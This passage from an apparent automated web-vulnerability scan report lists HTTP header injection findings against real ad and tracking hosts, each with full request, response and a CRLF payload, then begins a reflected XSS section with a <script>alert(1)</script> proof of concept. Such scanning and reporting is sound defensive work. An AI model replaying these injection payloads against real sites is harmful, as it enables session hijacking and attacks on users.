GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ae973%0d%0a0345b07197e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ae973
0345b07197e
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ae973
0345
...[SNIP]...

2.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 29b5a%0d%0ac4af126ee8c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=29b5a%0d%0ac4af126ee8c&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:29b5a
c4af126ee8c
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=59
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',29b5a
c4af
...[SNIP]...

2.45. http://dw.com.com/clear/c.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcbbe%0d%0a18ae7dfebfb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/fcbbe%0d%0a18ae7dfebfb?ptid=8301&onid=503544&asid=20031629&astid=28&x_breadcrumb=250%3A503544&ts=1297647365150&sid=162&ld=www.cbsnews.com&oid=8301-503544_162-20031629&brflv=10.2.154&brwinsz=1112x1010&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&srcUrl=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20031629-503544.html&title=Mitch%20Daniels%3A%20Debt%20is%20the%20New%20%22Red%20Menace%22%20-%20Political%20Hotsheet%20-%20CBS%20News HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.cbsnews.com/clear/fcbbe
18ae7dfebfb
?ts=1297647425497435&clgf=Cg5iVU0qL2O/AAAAdRw
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif


2.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://live.activeconversion.com
Path:   /webtracker/track2.html

Issue detail

The value of the avc request parameter is copied into the Set-Cookie response header. The payload 6ab95%0d%0af1c7ac10bc3 was submitted in the avc parameter. This caused a response containing an injected HTTP header.

Request

GET /webtracker/track2.html?method=track&pid=30120&uclkt=1&alh=http%3A//mzima.net/&avc=6ab95%0d%0af1c7ac10bc3&source=&keyword=&ref=&pageTitle=PacketExchange%20-%20MZIMA%20-%20Global%20IP%20/%20Internet%20bandwidth%2C%20Peering%2C%20Content%20Delivery%20/%20CDN%2C%20Ethernet%20Private%20Line%20and%20Colocation%20/%20Datacenter%20Services&pageUrl=http%3A%2F%2Fmzima.net%2F&java=1&amcs=0.44739386485889554 HTTP/1.1
Host: live.activeconversion.com
Proxy-Connection: keep-alive
Referer: http://mzima.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _wt_31021=1296942871924|f64d-6178-34ed-5f2e12df7d201ca|0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:37:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B277C118513B36E9839C0F3995AFC9C6; Path=/webtracker
Set-Cookie: _wt_30120="1297694251289|6ab95
f1c7ac10bc3
|0"; Max-Age=630720000;Path=/; HttpOnly
P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM"
Connection: close
Content-Type: image/png
Content-Length: 68

.PNG
.
...IHDR.....................IDATx.c`...............IEND.B`.

2.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload af142%0d%0ac17363f719d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=12327&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5af142%0d%0ac17363f719d; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:29 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252249|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647449^1297649249|12327^1297647449^1297649249; path=/; expires=Mon, 14-Feb-11 02:07:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5af142
c17363f719d
,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

2.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload a3bf5%0d%0af4a1b2b0c20 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=a3bf5%0d%0af4a1b2b0c20&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:28 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:28 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252248|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647448^1297649248|a3bf5
f4a1b2b0c20
^1297647448^1297649248; path=/; expires=Mon, 14-Feb-11 02:07:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

2.49. http://w55c.net/m.gif [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w55c.net
Path:   /m.gif

Issue detail

The value of the rurl request parameter is copied into the Location response header. The payload a0486%0d%0a6392edd76fb was submitted in the rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /m.gif?rurl=a0486%0d%0a6392edd76fb HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; matchadmeld=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 302 Found
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Location: http://a0486
6392edd76fb

Content-Length: 0
Date: Mon, 14 Feb 2011 01:34:34 GMT
Server: w55c.net


3. Cross-site scripting (reflected)  previous
There are 691 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2a<script>alert(1)</script>2a020577f18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;sz=300x250;ord=3461791? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
